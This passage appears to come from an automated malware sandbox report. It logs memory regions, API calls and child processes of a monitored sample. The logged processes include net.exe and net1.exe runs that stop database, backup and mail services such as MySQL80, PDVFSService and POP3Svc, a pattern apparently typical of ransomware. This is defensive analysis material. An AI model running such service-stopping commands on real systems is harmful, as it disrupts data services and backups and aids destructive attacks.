entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8759 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 8760 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8761 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 8762 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8763 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 688 os_tid = 0xc3c Process: id = "227" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5c8e3000" os_pid = "0x13c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop OracleClientCache80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8812 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8813 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8814 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8815 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8816 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8817 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8818 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8819 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8820 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8821 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8822 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 8823 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8824 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8825 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8826 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 690 os_tid = 0xd90 Process: id = "228" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x51906000" os_pid = "0xe14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8827 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8828 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8829 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8830 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8831 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8832 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8833 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8834 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8835 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8836 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8837 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 8838 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8839 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8840 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8841 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 692 os_tid = 0x13f0 Process: id = "229" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5dcbd000" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "221" os_parent_pid = "0x7e8" cmd_line = "C:\\Windows\\system32\\net1 stop MySQL80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8862 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8863 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8864 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8865 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 8866 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8867 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8868 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8869 start_va = 0xff890000 end_va = 0xff8c2fff entry_point = 0xff890000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8870 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8871 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8872 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8873 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 8874 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8875 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8876 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8877 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8878 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8879 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8880 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 8881 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 8882 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8883 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8884 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8885 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8886 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8887 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8888 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8889 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8890 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8891 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8892 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8893 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8894 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8895 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8896 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8897 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8898 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8899 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8915 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 694 os_tid = 0x13f8 [0107.366] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f850 | out: lpSystemTimeAsFileTime=0x12f850*(dwLowDateTime=0xf52577f0, dwHighDateTime=0x1d48689)) [0107.366] GetCurrentProcessId () returned 0xea4 [0107.366] GetCurrentThreadId () returned 0x13f8 [0107.366] GetTickCount () returned 0x2492f [0107.366] QueryPerformanceCounter (in: lpPerformanceCount=0x12f858 | out: lpPerformanceCount=0x12f858*=1815428500000) returned 1 [0107.368] GetModuleHandleW (lpModuleName=0x0) returned 0xff890000 [0107.368] __set_app_type (_Type=0x1) [0107.368] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8a9c9c) returned 0x0 [0107.368] __getmainargs (in: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788, _DoWildCard=0, _StartInfo=0xff8b479c | out: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788) returned 0 [0107.368] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.368] GetConsoleOutputCP () returned 0x1b5 [0107.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8bcec0 | out: lpCPInfo=0xff8bcec0) returned 1 [0107.368] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.370] sprintf_s (in: _DstBuf=0x12f7f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.370] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.371] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.371] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.371] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL80 /y" [0107.371] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f590, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.371] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.371] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f7e8 | out: Buffer=0x12f7e8*=0x204d40) returned 0x0 [0107.371] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f7e8 | out: Buffer=0x12f7e8*=0x20c0e0) returned 0x0 [0107.371] _fileno (_File=0x7fefdba2a80) returned 0 [0107.371] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.372] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.372] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.372] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.372] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.372] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.372] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.372] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.372] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.372] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.372] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.372] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.372] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.372] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.372] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.372] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.372] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.372] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.372] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.372] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.372] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.372] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.372] _wcsicmp (_String1="accounts", _String2="MySQL80") returned -12 [0107.372] _wcsicmp (_String1="computer", _String2="MySQL80") returned -10 [0107.372] _wcsicmp (_String1="config", _String2="MySQL80") returned -10 [0107.372] _wcsicmp (_String1="continue", _String2="MySQL80") returned -10 [0107.372] _wcsicmp (_String1="cont", _String2="MySQL80") returned -10 [0107.372] _wcsicmp (_String1="file", _String2="MySQL80") returned -7 [0107.372] _wcsicmp (_String1="files", _String2="MySQL80") returned -7 [0107.372] _wcsicmp (_String1="group", _String2="MySQL80") returned -6 [0107.372] _wcsicmp (_String1="groups", _String2="MySQL80") returned -6 [0107.372] _wcsicmp (_String1="help", _String2="MySQL80") returned -5 [0107.372] _wcsicmp (_String1="helpmsg", _String2="MySQL80") returned -5 [0107.372] _wcsicmp (_String1="localgroup", _String2="MySQL80") returned -1 [0107.372] _wcsicmp (_String1="pause", _String2="MySQL80") returned 3 [0107.372] _wcsicmp (_String1="session", _String2="MySQL80") returned 6 [0107.372] _wcsicmp (_String1="sessions", _String2="MySQL80") returned 6 [0107.372] _wcsicmp (_String1="sess", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="share", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="start", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="stats", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="statistics", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="stop", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="time", _String2="MySQL80") returned 7 [0107.373] _wcsicmp (_String1="user", _String2="MySQL80") returned 8 [0107.373] _wcsicmp (_String1="users", _String2="MySQL80") returned 8 [0107.373] _wcsicmp (_String1="msg", _String2="MySQL80") returned -6 [0107.373] _wcsicmp (_String1="messenger", _String2="MySQL80") returned -20 [0107.373] _wcsicmp (_String1="receiver", _String2="MySQL80") returned 5 [0107.373] _wcsicmp (_String1="rcv", _String2="MySQL80") returned 5 [0107.373] _wcsicmp (_String1="netpopup", _String2="MySQL80") returned 1 [0107.373] _wcsicmp (_String1="redirector", _String2="MySQL80") returned 5 [0107.373] _wcsicmp (_String1="redir", _String2="MySQL80") returned 5 [0107.373] _wcsicmp (_String1="rdr", _String2="MySQL80") returned 5 [0107.373] _wcsicmp (_String1="workstation", _String2="MySQL80") returned 10 [0107.373] _wcsicmp (_String1="work", _String2="MySQL80") returned 10 [0107.373] _wcsicmp (_String1="wksta", _String2="MySQL80") returned 10 [0107.373] _wcsicmp (_String1="prdr", _String2="MySQL80") returned 3 [0107.373] _wcsicmp (_String1="devrdr", _String2="MySQL80") returned -9 [0107.373] _wcsicmp (_String1="lanmanworkstation", _String2="MySQL80") returned -1 [0107.373] _wcsicmp (_String1="server", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="svr", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="srv", _String2="MySQL80") returned 6 [0107.373] _wcsicmp (_String1="lanmanserver", _String2="MySQL80") returned -1 [0107.373] _wcsicmp (_String1="alerter", _String2="MySQL80") returned -12 [0107.373] _wcsicmp (_String1="netlogon", _String2="MySQL80") returned 1 [0107.373] _wcsupr (in: _String="MySQL80" | out: _String="MYSQL80") returned="MYSQL80" [0107.373] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x20cdf0 [0107.498] GetServiceKeyNameW (in: hSCManager=0x20cdf0, lpDisplayName="MYSQL80", lpServiceName=0xff8b5750, lpcchBuffer=0x12f708 | out: lpServiceName="", lpcchBuffer=0x12f708) returned 0 [0107.498] _wcsicmp (_String1="msg", _String2="MYSQL80") returned -6 [0107.499] _wcsicmp (_String1="messenger", _String2="MYSQL80") returned -20 [0107.499] _wcsicmp (_String1="receiver", _String2="MYSQL80") returned 5 [0107.499] _wcsicmp (_String1="rcv", _String2="MYSQL80") returned 5 [0107.499] _wcsicmp (_String1="redirector", _String2="MYSQL80") returned 5 [0107.499] _wcsicmp (_String1="redir", _String2="MYSQL80") returned 5 [0107.499] _wcsicmp (_String1="rdr", _String2="MYSQL80") returned 5 [0107.499] _wcsicmp (_String1="workstation", _String2="MYSQL80") returned 10 [0107.499] _wcsicmp (_String1="work", _String2="MYSQL80") returned 10 [0107.499] _wcsicmp (_String1="wksta", _String2="MYSQL80") returned 10 [0107.499] _wcsicmp (_String1="prdr", _String2="MYSQL80") returned 3 [0107.499] _wcsicmp (_String1="devrdr", _String2="MYSQL80") returned -9 [0107.499] _wcsicmp (_String1="lanmanworkstation", _String2="MYSQL80") returned -1 [0107.499] _wcsicmp (_String1="server", _String2="MYSQL80") returned 6 [0107.499] _wcsicmp (_String1="svr", _String2="MYSQL80") returned 6 [0107.499] _wcsicmp (_String1="srv", _String2="MYSQL80") returned 6 [0107.499] _wcsicmp (_String1="lanmanserver", _String2="MYSQL80") returned -1 [0107.499] _wcsicmp (_String1="alerter", _String2="MYSQL80") returned -12 [0107.499] _wcsicmp (_String1="netlogon", _String2="MYSQL80") returned 1 [0107.499] NetServiceControl (in: servername=0x0, service="MYSQL80", opcode=0x0, arg=0x0, bufptr=0x12f710 | out: bufptr=0x12f710) returned 0x889 [0107.500] wcscpy_s (in: _Destination=0xff8b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.500] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0107.500] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.501] GetFileType (hFile=0xb) returned 0x2 [0107.502] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0107.502] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0x12f5d0*=0x1e) returned 1 [0107.502] GetFileType (hFile=0xb) returned 0x2 [0107.502] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0107.502] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0x12f5d0*=0x2) returned 1 [0107.503] _ultow (in: _Dest=0x889, _Radix=1242688 | out: _Dest=0x889) returned="2185" [0107.503] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.503] GetFileType (hFile=0xb) returned 0x2 [0107.503] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0107.503] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0x12f5d0*=0x34) returned 1 [0107.503] GetFileType (hFile=0xb) returned 0x2 [0107.503] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0107.504] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0x12f5d0*=0x2) returned 1 [0107.504] NetApiBufferFree (Buffer=0x204d40) returned 0x0 [0107.504] NetApiBufferFree (Buffer=0x20c0e0) returned 0x0 [0107.504] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL80 /y" [0107.504] exit (_Code=2) Process: id = "230" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e523000" os_pid = "0xeb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop POP3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 